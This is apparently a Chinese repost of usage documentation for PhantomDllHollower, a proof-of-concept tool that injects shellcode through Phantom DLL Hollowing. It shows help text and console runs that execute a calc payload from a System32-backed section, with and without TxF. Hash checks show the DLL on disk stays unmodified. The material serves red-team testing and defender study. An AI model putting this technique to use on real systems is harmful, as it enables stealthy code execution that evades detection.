Phantom DLL Hollowing 的 CSharp 实现
实现 dll Phantom
2023-06-13 09:17:11 时间
C:\Tools>PhantomDllHollower.exe
PhantomDllHollower - Tool for testing Phantom DLL Hollowing.
Usage: PhantomDllHollower.exe [Options]
-h, --help : Displays this help message.
-p, --payload : Specifies shellcode to execute.
-t, --txf : Flag to use TxF. This option requires administrative privilege.
[!] -p option is required.
要使用此 PoC,请指定要执行的 shellcode 文件,如下所示:
C:\Tools>powershell -c Get-Process calc*
C:\Tools>PhantomDllHollower.exe -p calc.bin
[>] Trying to read payload from C:\Tools\calc.bin.
[+] Payload is read successfully (276 bytes).
[>] Searching target module file from C:\Windows\system32.
[+] Got target module path.
[*] Target : C:\Windows\system32\aadauthhelper.dll
[>] Trying to create section object for payload.
[+] Payload section object is created successfully.
[*] Section Handle : 0x2CC
[>] Trying to map payload section.
[+] Payload Section is mapped at 0x00007FF86D2C0000.
[>] Trying to write shellcode to payload section's entry point.
[*] Entry Point @ 0x00007FF86D2C2900
[+] Shellcode is written successfully.
[>] Executing your shellcode.
[+] Shellcode thread is created successfully.
[*] Waiting for shellcode thread exit.
[*] Done.
C:\Tools>powershell -c Get-Process calc*
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
598 49 30140 74824 0.34 7760 1 CalculatorApp
如果你想使用 TxF 技术,设置-t
标志以及 shellcode 文件路径。此选项需要管理权限:
C:\Tools>certutil -hashfile C:\Windows\System32\concrt140.dll sha1
SHA1 hash of C:\Windows\System32\concrt140.dll:
2497d0e241c1adf74f03d7d6065e0e0dd365a9d9
CertUtil: -hashfile command completed successfully.
C:\Tools>powershell -c Get-Process calc*
C:\Tools>whoami /groups | findstr /i level
Mandatory Label\High Mandatory Level Label S-1-16-12288
C:\Tools>PhantomDllHollower.exe -p calc.bin -t
[>] Trying to read payload from C:\Tools\calc.bin.
[+] Payload is read successfully (276 bytes).
[>] Searching target module file from C:\Windows\system32.
[*] TxF mode is enabled. This mode requires administrative privilege.
[+] Got target module path.
[*] Target : C:\Windows\system32\concrt140.dll
[>] Trying to generate payload data.
[+] Payload data is generated successfully.
[>] Trying to create section object for payload.
[+] Payload section object is created successfully.
[*] Section Handle : 0x318
[>] Trying to map payload section.
[+] Payload Section is mapped at 0x00007FF863F80000.
[*] Shellcode @ 0x00007FF863FAD030
[>] Executing your shellcode.
[+] Shellcode thread is created successfully.
[*] Waiting for shellcode thread exit.
[*] Done.
C:\Tools>certutil -hashfile C:\Windows\System32\concrt140.dll sha1
SHA1 hash of C:\Windows\System32\concrt140.dll:
2497d0e241c1adf74f03d7d6065e0e0dd365a9d9
CertUtil: -hashfile command completed successfully.
C:\Tools>powershell -c Get-Process calc*
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
598 49 30136 55972 0.30 7504 1 CalculatorApp
如果在-t
没有管理权限的情况下设置标志,则无法搜索目标 DLL,如下所示:
C:\Tools>powershell -c Get-Process calc*
C:\Tools>whoami /groups | findstr /i level
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
C:\Tools>PhantomDllHollower.exe -p calc.bin -t
[>] Trying to read payload from C:\Tools\calc.bin.
[+] Payload is read successfully (276 bytes).
[>] Searching target module file from C:\Windows\system32.
[*] TxF mode is enabled. This mode requires administrative privilege.
[-] Failed to find abusable module. You may not have sufficient privileges.
C:\Tools>powershell -c Get-Process calc*
https://github.com/daem0nc0re/TangledWinExec/tree/main/PhantomDllHollower
相关文章
- 使用ICSharpCode.SharpZipLib.dll实现在线解压缩
- 使用EasyExce实现Excel文件解析
- C/C++ 通过中转函数实现DLL劫持
- SQLServer存储过程创建和修改的实现代码
- Linux 下移动文件夹的实现方法(mv文件夹linux)
- 下的应用Linux下动态链接库DLL的应用(dll在linux)
- Oracle调用DLL解决问题的技巧(oracle调用dll)
- 使用触发器SQL Server中运用触发器实现简单动态操作(在sqlserver中)
- 管理基于SQL Server实现高效图片管理(sqlserver 图片)
- MySQL拓展C语言实现DLL文件功能(c mysql .dll)
- 利用ortacle加载DLL文件实现多种功能(dll文件oracle)
- MySQL实现两个字段的比较方法(mysql两字段比较)
- 应用分布式应用程序的实现基于Redis的方案(基于redis做分布式)
- Oracle数据库技术来自动态链接库 DLL(oracle_dll)
- 利用Oracle ODBC实现多种数据库间交互(oracle Obdc)
- 构建Oracle HR系统实现电子邮件管理(oracle hr邮箱)
- Oracle DLL语句展现更强大的数据操作能力(oracle dll语句)
- Oracle DLL路径的解密寻踪(oracle dll路径)
- 采用Redis缓存极大提高DLL加载效率(redis缓存的dll)
- PHP连接SQLServer2005的实现方法(附ntwdblib.dll下载)
- 在liunx中编写一个脚步定期删除mysql中的数据实现步骤
- java实现动态代理示例分享
- C#实现动态加载dll的方法
- Windows下使用apache模块实现合并多个js、css提高网页加载速度